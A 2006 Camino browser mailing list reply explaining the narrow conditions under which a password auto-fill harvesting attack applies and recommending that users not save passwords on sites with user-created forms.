On Nov 23, 2006, at 8:51 AM, Martin Girschick wrote: > I guess a way to temporarily disable password auto-fill until the > issue is resolved is to uncheck "Save web form passwords..." in the > "Privacy"-section.
Or just remove/don't store passwords for sites with largely unrestricted, user-provided content. The attack only applies to sites where: a) you have to log in to the site, and b) people other than site admins have the ability to create HTML forms with password elements on the site, and c) the realm of the login page is the same as the realm of the user- created pages (i.e., there is not a login.foo.com page for logging in). The fraction of sites on the web meeting those criteria is very, very small. Simply not using password storage on those particular sites is just as secure as turning the feature off completely, with much less reduction in functionality. -Stuart _______________________________________________ Camino mailing list [email protected] http://mozdev.org/mailman/listinfo/camino
